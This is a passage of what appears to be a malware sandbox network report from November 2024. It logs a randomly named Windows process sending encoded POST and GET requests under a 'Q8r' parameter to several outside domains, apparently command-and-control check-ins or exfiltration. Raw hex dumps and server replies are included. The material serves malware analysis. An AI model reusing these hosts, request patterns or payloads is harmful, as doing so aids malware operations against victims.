b7 cb 11 c4 57 32 7b 0a ba 90 f8 41 3b 12 11 ee 9c 96 26 82 97 d6 c7 9e 9c 2e 17 68 a4 ab b4 cd 30 5d e0 cf d5 b9 e7 49 9f 58 6a 4b 0e c7 13 f3 7a da 1e 7a dd 21 7e d1 2a d4 19 6e a7 43 e5 52 5e a7 38 9e 82 a9 e2 7a 7e 33 1f b3 c5 Data Ascii: 187lRn0+U,'Y6>CS\F=]^Y,fv1\| I9DQK),}A 9'XR8p@6,em"%/}pv6:r.,l6[d2!I'smXm T1W2{A;&.h0]IXjKzz!~*nCR^8z~3
Nov 4, 2024 10:11:37.604201078 CET	112	IN	Data Raw: 5e ff a6 0c b3 9b 41 97 27 e3 c4 c6 3d 25 7f 17 95 f7 33 5b 5d b4 3d 0d 5a e9 3d 0a 23 bd 5f 8a 93 51 f1 7f 7e 5e a7 ab 35 3b d7 45 08 35 a1 95 15 a1 e3 1d a4 23 18 e6 ad b6 15 4a 76 28 78 67 14 2c 07 6c 08 65 bf a6 49 9e d4 e9 65 d3 3c 51 7a ff Data Ascii: ^A'=%3[]=Z=#_Q~^5;E5#Jv(xg,leIe<Qzfy'w{0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49965	104.21.3.144	80	5332	C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 10:11:39.048511982 CET	10834	OUT	POST /vpuy/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Host: www.98yl9900.vip Origin: http://www.98yl9900.vip Content-Length: 10300 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.98yl9900.vip/vpuy/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13 Data Raw: 51 38 72 3d 4c 71 4a 48 4d 65 43 31 67 33 43 2f 32 72 75 76 36 62 68 63 68 61 56 69 59 79 32 7a 55 51 4f 53 6c 72 7a 4a 73 4a 54 32 32 33 74 2b 2b 35 53 71 74 30 4e 75 69 56 73 58 44 63 2b 6d 31 56 43 73 73 79 66 68 7a 42 76 5a 73 53 54 75 66 63 6b 44 37 43 6c 46 5a 30 33 54 47 67 45 6a 65 34 77 55 46 42 6d 69 6d 66 56 37 62 64 6e 67 4a 6e 58 47 39 6b 43 4a 7a 42 56 77 70 4f 38 78 36 42 69 35 67 2b 4e 6e 56 79 57 75 4b 72 44 54 56 47 31 6f 36 59 45 63 34 71 35 4b 46 76 57 4b 37 64 67 41 44 2b 6d 63 33 35 69 61 64 30 35 78 71 4a 7a 54 73 47 45 72 39 6f 31 37 4f 76 44 4c 65 50 68 50 6a 77 4d 74 70 4e 54 6b 71 4d 7a 55 74 42 66 72 46 78 66 79 6c 70 6f 53 39 51 34 4a 69 45 36 43 50 30 51 45 78 44 45 48 67 73 55 42 4c 32 69 49 73 61 32 67 6b 2b 47 6e 52 78 4f 5a 75 62 7a 68 6a 4c 70 4a 33 4c 70 73 41 44 69 6d 77 72 57 36 65 34 6b 4c 4c 30 46 77 63 37 31 36 44 69 6e 4d 42 6b 59 64 50 78 63 30 71 51 50 6d 37 5a 71 35 62 45 41 75 50 71 43 77 64 6f 65 4f 5a 4f 2b 37 4d 7a 46 79 42 72 71 6b 70 71 61 2f 78 61 [TRUNCATED] Data Ascii: Q8r=LqJHMeC1g3C/2ruv6bhchaViYy2zUQOSlrzJsJT223t++5Sqt0NuiVsXDc+m1VCssyfhzBvZsSTufckD7ClFZ03TGgEje4wUFBmimfV7bdngJnXG9kCJzBVwpO8x6Bi5g+NnVyWuKrDTVG1o6YEc4q5KFvWK7dgAD+mc35iad05xqJzTsGEr9o17OvDLePhPjwMtpNTkqMzUtBfrFxfylpoS9Q4JiE6CP0QExDEHgsUBL2iIsa2gk+GnRxOZubzhjLpJ3LpsADimwrW6e4kLL0Fwc716DinMBkYdPxc0qQPm7Zq5bEAuPqCwdoeOZO+7MzFyBrqkpqa/xaG0u2O030fi1RgUhhoW9Kl25+2vcWUIHPYvh3xjhmyOYyWPQTMfBg3SkdqAWSbHgYLIBAu6CWCI0niF5cDVrHUnGcZMbfjB8++7ocIuui4SweU0TINuVCfXfhlVcYmO31g6o1znGakyXlH6BDFG5zGQnhGuL2Cmh14Zr4vIlRLOBBXDZG5CzTPlboXXNct13pF0Jz+7PpUT5B6kguwhdXLc/R5N+Rz6HmeTqkKboJi8E//cYTfvc5/ehmLMgMuYbF/8SGwlVZflCx4akmfwgngUyAiFmK3RIeCDkl/U+yMq0RKWVTr1WgT6Y/Y6gChJFtTyi0i5Op6zje1qvyNFuyaqXV0BUhKZ1ngUvibQfOP8LcAb9PXvLwUsPxloszoRCzp1MYFbbcZIgJovk9JnacOyeEUF/sgslEpkso5Ky1jGQkcyho/3JkgyjE3yUmjrspwAKYgJRN0dGPGwBUV1yZdZ8lk9AUNyldm9qmNR+xPP4CKAwiKiauD6d4aG2LBA2GbaTwUuDfzzHOgrhYwEleYLomn3I6y31mnCHHNbBd1w3s7Ac9jSHCgMKZ6g5bRvYXYx04h0PMly6lMOPIZB+PY/mIea7fDnwteSN9ViTRnfN8IDAeA7erdscT1pFumsU9sXhKEnwbrK51Iygetb/ScbldcsB3VDCV/y [TRUNCATED]
Nov 4, 2024 10:11:40.092001915 CET	1236	IN	HTTP/1.1 404 Not Found Date: Mon, 04 Nov 2024 09:11:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Access-Control-Allow-Origin: * Access-Control-Allow-Methods: * Access-Control-Allow-Headers: * Cache-Control: no-cache, private cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bA%2BQeFHZwtuMrBlHNa3ZN%2FfcDy5nkorib22UOKIb3feyeEbZslsV01SE%2B3Zti%2FtZcEFlLmAnpGgV63EkzNtFN3rP9iV5r2aHU4McusmCMQY2V0DbpL6ZbN%2BohMr2n6YtsZG0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8dd37a5859fa4779-DFW Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1562&sent=6&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10834&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 37 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6c 52 cb 6e db 30 10 bc e7 2b a6 ec 55 b2 2c 27 0e 0a 59 36 90 3e 82 f6 d0 a6 a8 93 43 8e b4 b8 92 08 53 5c 81 a4 1d ab 46 ff 3d 90 84 b8 a8 5d 5e c8 59 cc 2c 66 76 99 bf fb fc f0 e9 f1 f9 e7 17 d4 a1 31 ab ab 7c bc 00 20 af 49 aa f1 39 c0 86 82 44 51 4b e7 29 2c c5 d3 e3 7d fc 41 20 39 27 58 d9 d0 52 38 de 70 f0 02 05 db 40 36 2c 85 65 6d 15 1d 22 cb 25 1b c3 2f ff 2a 7d e8 0c ad 70 76 36 ac 3a 1c b1 91 c5 b6 72 bc b3 2a 2e d8 b0 cb f0 be 2c cb 05 de c0 6c 36 5b a0 64 1b 32 a4 b7 ed 21 49 27 73 c4 b2 6d 0d c5 be f3 81 9a 08 1f 8d b6 db ef b2 58 0f f8 9e 6d 88 20 d6 54 31 e1 e9 9b 88 f0 ab b7 cb 11 c4 57 32 7b 0a ba 90 f8 41 3b 12 11 ee 9c 96 26 82 97 d6 c7 9e 9c 2e 17 68 a4 ab b4 cd 30 5d e0 cf d5 b9 e7 49 9f 58 6a 4b 0e c7 13 f3 7a da 1e 7a dd 21 7e d1 2a d4 19 6e a7 43 e5 52 5e a7 38 9e 82 a9 e2 7a 7e 33 1f b3 c5 5e ff a6 Data Ascii: 17dlRn0+U,'Y6>CS\F=]^Y,fv1\| I9DQK),}A 9'XR8p@6,em"%/}pv6:r.,l6[d2!I'smXm T1W2{A;&.h0]IXjKzz!~*nCR^8z~3^
Nov 4, 2024 10:11:40.092114925 CET	109	IN	Data Raw: 0c b3 9b 41 97 27 e3 c4 c6 3d 25 7f 17 95 f7 33 5b 5d b4 3d 0d 5a e9 3d 0a 23 bd 5f 8a 93 51 f1 7f 7e 5e a7 ab 35 3b d7 45 08 35 a1 95 15 a1 e3 1d a4 23 18 e6 ad b6 15 4a 76 28 78 67 14 2c 07 6c 08 65 bf a6 49 9e d4 e9 65 d3 3c 51 7a ff 66 79 f4 Data Ascii: A'=%3[]=Z=#_Q~^5;E5#Jv(xg,leIe<Qzfy'w{a
Nov 4, 2024 10:11:40.092125893 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49978	104.21.3.144	80	5332	C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 10:11:41.607145071 CET	464	OUT	GET /vpuy/?Q8r=GohnPojKoDSo26eExaRPtq0fYHz1awKnkuX4rqCOwHJs0Om2tBI/qHVUK+LhjFCYnUGrzAuj4BG5Iu5ezVBqMm60AjojQL4Je3zYgtUuMeqMe2LW7C+ksjQ=&6trpq=anQT3n HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Host: www.98yl9900.vip Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
Nov 4, 2024 10:11:42.714726925 CET	1236	IN	HTTP/1.1 404 Not Found Date: Mon, 04 Nov 2024 09:11:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Access-Control-Allow-Origin: * Access-Control-Allow-Methods: * Access-Control-Allow-Headers: * Cache-Control: no-cache, private cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vsqhK5HbgmiABFpHGXz9FepJoljrfOBzgYHqweAOGTdPN45yzrZEQn%2BlzdT4fVfqfLEVlResxX%2BDDOCgsB05jvPTRT%2FcIj9%2FAYMlUlDu1jp96hKWCd1XaZe38U%2FYtqYIkr7S"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8dd37a68bce26c6e-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1628&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=464&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 32 38 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 63 6f 6c 6f 72 3a 20 23 32 32 32 3b 20 66 6f 6e 74 3a 20 31 36 70 78 2f 31 2e 35 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 6d 61 72 67 69 6e 3a 20 30 Data Ascii: 285<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta name="robots" content="noindex,nofollow" /> <style> body { background-color: #fff; color: #222; font: 16px/1.5 -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif; margin: 0
Nov 4, 2024 10:11:42.714816093 CET	336	IN	Data Raw: 3b 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 20 6d 61 72 67 69 6e 3a 20 33 30 70 78 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 36 30 30 70 78 3b 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: ; } .container { margin: 30px; max-width: 600px; } h1 { color: #dc3545; font-size: 24px; }</style> </head> <body> <div class="container"> <h1>Sorry, the page y

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	50008	76.223.67.189	80	5332	C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 10:11:47.778816938 CET	756	OUT	POST /vzdg/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Host: www.mjmegartravel.online Origin: http://www.mjmegartravel.online Content-Length: 200 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.mjmegartravel.online/vzdg/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13 Data Raw: 51 38 72 3d 48 47 55 67 4d 65 61 64 39 47 48 43 63 59 41 41 35 54 74 4b 6b 70 4b 6f 45 47 58 4f 38 58 67 43 7a 45 69 46 59 53 79 4e 66 74 77 52 34 4a 52 36 2b 57 58 50 4b 43 48 7a 2b 6d 6f 5a 53 67 74 72 79 49 69 72 46 69 72 52 58 4f 6a 59 42 30 79 69 72 56 63 31 55 47 2f 79 32 77 38 39 6d 4b 41 33 4c 74 7a 51 72 54 53 48 70 66 78 66 73 30 46 31 31 4e 44 58 2b 38 64 36 77 58 49 76 6c 63 4a 63 6c 73 71 79 4a 49 4f 62 66 56 68 56 34 72 49 45 6e 2f 6f 74 36 63 70 6d 63 32 42 55 53 63 7a 52 63 79 69 47 4b 4c 6d 6f 71 69 73 54 43 66 55 54 78 75 6f 63 77 36 6d 55 66 6c 38 41 52 2f 73 65 54 41 3d 3d Data Ascii: Q8r=HGUgMead9GHCcYAA5TtKkpKoEGXO8XgCzEiFYSyNftwR4JR6+WXPKCHz+moZSgtryIirFirRXOjYB0yirVc1UG/y2w89mKA3LtzQrTSHpfxfs0F11NDX+8d6wXIvlcJclsqyJIObfVhV4rIEn/ot6cpmc2BUSczRcyiGKLmoqisTCfUTxuocw6mUfl8AR/seTA==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	50016	76.223.67.189	80	5332	C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 10:11:50.496211052 CET	776	OUT	POST /vzdg/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Host: www.mjmegartravel.online Origin: http://www.mjmegartravel.online Content-Length: 220 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.mjmegartravel.online/vzdg/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13 Data Raw: 51 38 72 3d 48 47 55 67 4d 65 61 64 39 47 48 43 64 34 51 41 71 67 31 4b 31 35 4b 76 42 47 58 4f 32 33 68 4c 7a 45 75 46 59 54 32 64 66 62 67 52 37 6f 68 36 73 48 58 50 4a 43 48 7a 6e 57 6f 6d 66 41 74 65 79 49 76 57 46 6d 33 52 58 4b 4c 59 42 77 69 69 73 6d 45 30 47 47 2f 30 37 51 38 2f 6c 36 41 33 4c 74 7a 51 72 54 32 39 70 66 70 66 73 46 56 31 30 73 44 55 32 63 64 31 35 33 49 76 68 63 4a 59 6c 73 71 41 4a 4a 43 39 66 51 39 56 34 75 73 45 6d 74 41 73 7a 63 70 67 42 6d 41 49 43 73 7a 61 53 52 50 32 44 70 71 73 33 6a 6b 78 44 5a 5a 4a 67 66 4a 4c 69 36 43 6e 43 69 31 30 63 38 52 58 49 4d 66 35 63 66 43 42 76 61 53 6d 5a 50 65 7a 6b 4b 65 57 6e 31 6b 3d Data Ascii: Q8r=HGUgMead9GHCd4QAqg1K15KvBGXO23hLzEuFYT2dfbgR7oh6sHXPJCHznWomfAteyIvWFm3RXKLYBwiismE0GG/07Q8/l6A3LtzQrT29pfpfsFV10sDU2cd153IvhcJYlsqAJJC9fQ9V4usEmtAszcpgBmAICszaSRP2Dpqs3jkxDZZJgfJLi6CnCi10c8RXIMf5cfCBvaSmZPezkKeWn1k=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	50017	76.223.67.189	80	5332	C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 10:11:53.069380045 CET	10858	OUT	POST /vzdg/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Host: www.mjmegartravel.online Origin: http://www.mjmegartravel.online Content-Length: 10300 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.mjmegartravel.online/vzdg/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13 Data Raw: 51 38 72 3d 48 47 55 67 4d 65 61 64 39 47 48 43 64 34 51 41 71 67 31 4b 31 35 4b 76 42 47 58 4f 32 33 68 4c 7a 45 75 46 59 54 32 64 66 62 6f 52 34 65 56 36 2b 30 76 50 49 43 48 7a 34 6d 6f 64 66 41 74 48 79 49 33 53 46 6d 37 6e 58 4d 50 59 41 58 4b 69 74 58 45 30 4d 47 2f 30 6b 41 38 38 6d 4b 42 74 4c 74 6a 55 72 54 6d 39 70 66 70 66 73 47 39 31 33 39 44 55 30 63 64 36 77 58 49 4b 6c 63 4a 67 6c 73 79 51 4a 4a 48 41 66 6b 78 56 34 4f 38 45 67 59 63 73 78 38 70 69 43 6d 41 41 43 73 2b 43 53 51 69 50 44 6f 65 47 33 6a 67 78 42 2b 45 57 6c 64 35 74 38 4b 4b 36 62 46 4a 32 63 66 6f 56 47 72 58 75 54 75 61 65 77 62 32 54 58 2b 2b 39 30 36 4b 75 37 6a 42 72 6d 68 6a 75 36 35 5a 4e 63 5a 69 6f 78 6d 6b 59 4a 53 49 62 4c 41 31 41 64 4a 32 77 2b 65 78 33 79 4d 50 67 6a 44 67 31 69 59 44 57 46 58 69 75 4e 49 71 46 4c 54 39 71 76 34 4b 42 4f 62 57 2f 4b 4b 72 56 72 4a 35 2b 59 54 71 72 4d 47 7a 69 4c 57 7a 6d 4a 53 49 32 4c 6e 49 6f 75 55 75 77 6b 2b 65 74 7a 30 54 45 6b 45 70 65 2b 36 69 51 4e 62 44 61 6e 46 [TRUNCATED] Data Ascii: Q8r=HGUgMead9GHCd4QAqg1K15KvBGXO23hLzEuFYT2dfboR4eV6+0vPICHz4modfAtHyI3SFm7nXMPYAXKitXE0MG/0kA88mKBtLtjUrTm9pfpfsG9139DU0cd6wXIKlcJglsyQJJHAfkxV4O8EgYcsx8piCmAACs+CSQiPDoeG3jgxB+EWld5t8KK6bFJ2cfoVGrXuTuaewb2TX++906Ku7jBrmhju65ZNcZioxmkYJSIbLA1AdJ2w+ex3yMPgjDg1iYDWFXiuNIqFLT9qv4KBObW/KKrVrJ5+YTqrMGziLWzmJSI2LnIouUuwk+etz0TEkEpe+6iQNbDanFNF0fUOVjFeyLZXrZ34Hpn3a1LxSzO5K9oNsUB/Un1lwVNqKGkL9J4icQXUPtRipUxJCFmQ5cv43L8xnNRAxQZeLxPOAyOtUwFvm42yla0AJdKMiL+3k0Imi20bGhakAG1Plq4a+gY1QnvVSq99xpQRXtjY6LJ1X1WcH98JSmyCYlIKZ1JgIFGM0mfQjxktrun9UtjKUkd1nESTBuBIx41iFlvExjfH2VlvwstnhZx5lyy1nJgcLOCNhDIfUxPt3toDdTpueyOV35+VhB+0k4DSdkGu9faudJx/PXvzY1c2Q4sr2drZPjwG0etBvpMOCF2jbSwn8AbpdQSbrnO+2FOa70x1AFqo5sgGJZ9/SQG/u43G4UbAHCoJeAkG9iD7QG7smEVb/Cn76hcnmhLs4srewzoz9hQYyZVPlGXK3MdJb+2vjm/tiV9/93QbjFrcndmWmkl0aXooRFDPHd3O4SuR5HgqC+hK2DyQu/UyHIrJXK1AGqHnyx0eVklyvkzCq+Q2oW3SivG9NsAdWDpeK/3vkX4sa2yVlimINJp7ZmIURkf86ANRbfWF78RP8Rh+S2I3ynYJIMC0dJ/FUCMMyhV+n1Vc2ZcJMpuU+zMYLbC1IS1mxTxZQjeJvlk7jDjF2K5fz80mJSiZtxEuXjvlE9n23Z6HzBeeKIdJ [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	50018	76.223.67.189	80	5332	C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 10:11:55.611392975 CET	472	OUT	GET /vzdg/?Q8r=KE8APriLyHXVd58o2RVaxaHXOxKH6DBplwKhZxuWS8ol8ZNB+zrcGju15mUNFjZ4/qmrZG+pRN3cP3bWpxBJDHDy3g5/i7RwSLvxhij0g+QyzFB905H5wec=&6trpq=anQT3n HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Host: www.mjmegartravel.online Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
Nov 4, 2024 10:11:56.260510921 CET	392	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 04 Nov 2024 09:11:56 GMT Content-Type: text/html Content-Length: 252 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 51 38 72 3d 4b 45 38 41 50 72 69 4c 79 48 58 56 64 35 38 6f 32 52 56 61 78 61 48 58 4f 78 4b 48 36 44 42 70 6c 77 4b 68 5a 78 75 57 53 38 6f 6c 38 5a 4e 42 2b 7a 72 63 47 6a 75 31 35 6d 55 4e 46 6a 5a 34 2f 71 6d 72 5a 47 2b 70 52 4e 33 63 50 33 62 57 70 78 42 4a 44 48 44 79 33 67 35 2f 69 37 52 77 53 4c 76 78 68 69 6a 30 67 2b 51 79 7a 46 42 39 30 35 48 35 77 65 63 3d 26 36 74 72 70 71 3d 61 6e 51 54 33 6e 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Q8r=KE8APriLyHXVd58o2RVaxaHXOxKH6DBplwKhZxuWS8ol8ZNB+zrcGju15mUNFjZ4/qmrZG+pRN3cP3bWpxBJDHDy3g5/i7RwSLvxhij0g+QyzFB905H5wec=&6trpq=anQT3n"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	50019	3.33.130.190	80	5332	C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 10:12:01.315690041 CET	741	OUT	POST /87jo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Host: www.energyparks.net Origin: http://www.energyparks.net Content-Length: 200 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.energyparks.net/87jo/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13 Data Raw: 51 38 72 3d 6c 78 61 4d 41 72 6a 47 79 76 64 6a 46 43 6d 33 4b 78 61 57 56 6d 76 36 67 7a 6b 34 61 4d 73 4c 34 4f 76 41 46 30 45 56 30 67 69 66 32 41 33 2f 50 59 54 33 53 4c 31 6f 37 66 69 4d 64 44 78 55 4c 4e 54 54 63 66 42 65 4e 35 51 61 6d 78 30 5a 49 64 78 56 48 65 58 71 57 49 4e 43 74 52 56 42 36 64 66 73 4e 2f 54 70 59 77 4f 53 7a 59 6d 39 59 56 41 31 54 76 52 6c 39 36 77 6e 71 4b 58 68 35 33 47 33 4f 5a 59 35 5a 58 46 34 70 4a 5a 4e 74 31 5a 4b 30 71 61 34 43 43 62 5a 4a 50 31 53 41 70 45 2f 72 47 38 4a 56 79 2b 59 42 46 58 63 51 6c 52 34 2b 68 39 46 6b 2b 6d 44 74 78 44 5a 6c 51 3d 3d Data Ascii: Q8r=lxaMArjGyvdjFCm3KxaWVmv6gzk4aMsL4OvAF0EV0gif2A3/PYT3SL1o7fiMdDxULNTTcfBeN5Qamx0ZIdxVHeXqWINCtRVB6dfsN/TpYwOSzYm9YVA1TvRl96wnqKXh53G3OZY5ZXF4pJZNt1ZK0qa4CCbZJP1SApE/rG8JVy+YBFXcQlR4+h9Fk+mDtxDZlQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	50020	3.33.130.190	80	5332	C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 10:12:03.863682985 CET	761	OUT	POST /87jo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Host: www.energyparks.net Origin: http://www.energyparks.net Content-Length: 220 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.energyparks.net/87jo/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13 Data Raw: 51 38 72 3d 6c 78 61 4d 41 72 6a 47 79 76 64 6a 47 68 2b 33 5a 47 75 57 64 6d 76 31 73 54 6b 34 51 73 73 50 34 4f 6a 41 46 78 68 4b 30 54 47 66 32 68 48 2f 65 73 50 33 52 4c 31 6f 30 2f 69 55 53 6a 77 59 4c 4e 50 78 63 65 39 65 4e 35 45 61 6d 77 45 5a 4a 71 6c 57 56 2b 58 6f 65 6f 4e 41 79 42 56 42 36 64 66 73 4e 2f 48 54 59 30 69 53 7a 6f 32 39 65 78 55 32 64 50 51 58 73 36 77 6e 67 71 58 6c 35 33 47 56 4f 59 56 57 5a 56 74 34 70 4c 42 4e 73 6b 5a 4e 36 71 61 32 63 79 61 75 50 4d 59 4d 45 4d 4a 50 31 51 77 41 4b 32 79 33 45 44 61 47 42 55 77 76 73 68 5a 32 35 35 76 33 67 79 2b 51 2b 55 6f 6a 72 47 52 51 69 44 6b 67 6d 4f 6f 42 4c 39 37 31 78 4a 4d 3d Data Ascii: Q8r=lxaMArjGyvdjGh+3ZGuWdmv1sTk4QssP4OjAFxhK0TGf2hH/esP3RL1o0/iUSjwYLNPxce9eN5EamwEZJqlWV+XoeoNAyBVB6dfsN/HTY0iSzo29exU2dPQXs6wngqXl53GVOYVWZVt4pLBNskZN6qa2cyauPMYMEMJP1QwAK2y3EDaGBUwvshZ255v3gy+Q+UojrGRQiDkgmOoBL971xJM=

